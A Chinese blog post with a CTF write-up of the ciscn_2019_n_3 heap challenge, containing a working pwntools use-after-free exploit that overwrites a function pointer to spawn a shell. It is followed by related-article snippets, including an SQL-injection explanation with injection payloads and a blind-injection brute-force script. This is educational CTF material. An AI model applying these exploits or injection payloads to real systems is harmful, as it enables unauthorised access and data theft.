buuoj刷题记录 - ciscn_2019_n_3 1

最新推荐文章于 2024-01-20 05:10:40 发布
最新推荐文章于 2024-01-20 05:10:40 发布
阅读量496 收藏 1
点赞数
分类专栏: pwn入门 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34010404/article/details/123500705
版权
本文揭示了一种通过UAF漏洞在程序中实现的攻击手段,详细描述了如何通过构造特定Node来修改函数地址,进而实现shellcode的执行。涉及步骤包括释放内存、添加内容和展示节点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看程序保护:
在这里插入图片描述
IDA分析程序,可以发现程序存在UAF漏洞:

在这里插入图片描述
在这里插入图片描述
只要使某一个Node的数据区域和已经free的Node的12个字节相重合,就可以修改函数地址.

只需要这样构造即可:
在这里插入图片描述
释放掉Node1,Node0,然后add一个 content为12字节的Node.就可以修改Node1的前12个字节.

1.可以修改Note1的前四个字节为 ‘sh\x00\x00’,后四个改为system.plt
2.可以修改Node1前四个字节为system.plt 的下一条指令地址(直接jmp由于该指令的地址低字节为0,system会截断.下一条指令会重新解析system地址,也是可以正常执行system函数的)
p32(system.plt 下一条指令地址) + ‘;sh\x00’

之后利用dump函数或者del就可以getshell了

exp:

from pwn import *
#sh = process('./pwn')

sh = remote('node4.buuoj.cn',28511)

def add(idx,value_type,content,length):
    sh.sendlineafter(b'CNote',b'1')
    sh.sendlineafter(b'Index',str(idx).encode())
    sh.sendlineafter(b'type:',str(value_type).encode())
    if value_type == 1:
        #整数
        sh.sendlineafter(b'1',str(content).encode())
    else:
        sh.sendlineafter(b'Length',str(length).encode())
        sh.sendlineafter(b'Value > ',content)
    
    sh.recvuntil(b'Okey, ')

def delnote(idx):
    sh.sendlineafter(b'CNote',b'2')
    sh.sendlineafter(b'Index',str(idx).encode())
    pass

def show(idx):
    sh.sendlineafter(b'CNote',b'3')
    sh.sendlineafter(b'Index',str(idx).encode())

add(0,2,'chunk0',16)
add(1,2,'chunk1',20)
#
delnote(1)
delnote(0)

#
payload = p32(0x8048506) + b';sh\x00'
#gdb.attach(sh)
add(2,2,payload,12)
#
show(1)

sh.interactive()

在这里插入图片描述

BUUCTF-PWN题记-5(Tcache)
weixin_44145820的博客
04-13 1582
ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记下返回地...
BUUCTF-PWN题记-22
weixin_44145820的博客
05-18 782
ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.youkuaiyun.com/A951860555/article/details/111991072
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1881
这里写自定义目标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 303
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
BUUCTF-PWN题记-21
weixin_44145820的博客
05-15 763
wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-PWN题记-13(静态编译+去除调试符号)
weixin_44145820的博客
04-27 1511
[中关村2019]one_string(unlink) [中关村2019]one_string(unlink) 看这个保护,我以为很简单,然而··· 这题去除了所有符号,并且是静态编译,所以第一步就是把主要函数找出来,如下 在edit函数中,程序会重新计算content的长度,这个时候如果利用了chunk复用,下一个chunk的size也会被计算进长度,这样下次编辑的时候就能覆盖si...
BUUCTF-PWN题记-12
weixin_44145820的博客
04-23 831
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3217
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
ciscn_2019_ne_3
seaaseesa的博客
05-07 485
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
ciscn_2019_n_3 Writeup
Calllin的博客
05-10 523
前提 本程序中的释放堆块后未对堆块指针置空,从而可能引发UAF。 程序本身带有函数system(),可以直接使用system@plt的方式使用该函数。 涉及堆块结构的代码如下下文所示,第一种块大小固定位0x10(0x11),有一种块大小可控,最大为0x400。 //当堆块结构是integer时 *(_DWORD *)v3 = rec_int_print; *(_DWORD *)(v3 + 4) = rec_int_free; *(_DWORD *)(v3 + 8) = ask("Value"); //
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 1124
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
ciscn_2019_n_3 题解
lifanxin的博客
12-30 697
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
ciscn_2019_n_3题目细说
Tw0的博客
02-04 271
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
ciscn_2019_n_3 writeup
SkYe's Blog
10-24 655
基本情况 这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。 程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下: struct int_chunk { void *rec_int_print(); void *rec_int_free();
ciscn_2019_n_3[use after free]
、moddemod
07-05 289
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def new_note(idx, _type, length, value): p.sendlineafter('CNote > ', str(1)) p.sendlineafter('Index > ', str(idx)) p.sendlin..
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 922
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
buuoj ez_sql
最新发布
03-22
### 关于BUUOJ平台上的 `ez_sql` 题目解析 在BUUOJ平台上,`ez_sql` 是一道经典的SQL注入练习题。这类题目通常旨在测试参赛者对于SQL语句构造的理解以及如何利用输入验证漏洞来获取数据库中的敏感数据。 #### SQL注入基础原理 SQL注入是一种常见的安全漏洞,攻击者通过向应用程序提交恶意的SQL代码片段,从而改变原本预期执行的查询逻辑[^1]。这种技术可以用来绕过身份认证、读取敏感数据或者破坏数据库结构。 针对 `ez_sql` 这类挑战的具体解决方法如下: #### 利用布尔盲注提取信息 如果目标应用返回的结果页面会因为不同的条件而有所变化,则可以通过发送一系列精心设计的请求逐步推断出隐藏的信息。例如,在登界面尝试使用 `' OR '1'='1 --` 的方式强制让WHERE子句恒成立以实现未授权访问[^2]。 #### 时间延迟法探测字符 当无法直接观察到反馈差异时,可采用基于时间的盲注技巧。这涉及到构建能使服务器响应变慢(取决于特定条件下触发sleep函数)的payloads, 如 `IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),0)` 来判断MySQL版本号的第一个数字是否为5[^3]。 以下是Python脚本的一个简单例子用于自动化上述过程的一部分: ```python import requests from string import digits, ascii_lowercase url = "http://example.com/login" charset = digits + ascii_lowercase result = '' for i in range(1, 21): found_char = False for char in charset: payload = f"' AND (SELECT SUBSTR(password,{i},1) FROM users WHERE id=1)='{char}'-- " data = {'username': payload, 'password':'random'} response = requests.post(url, data=data) if "Welcome" in response.text: result += char print(f"[+] Found character {char} at position {i}") found_char = True break if not found_char: break print("[*] Final password:", result) ``` 此代码仅作为学习用途展示可能的技术手段,请勿非法入侵任何系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值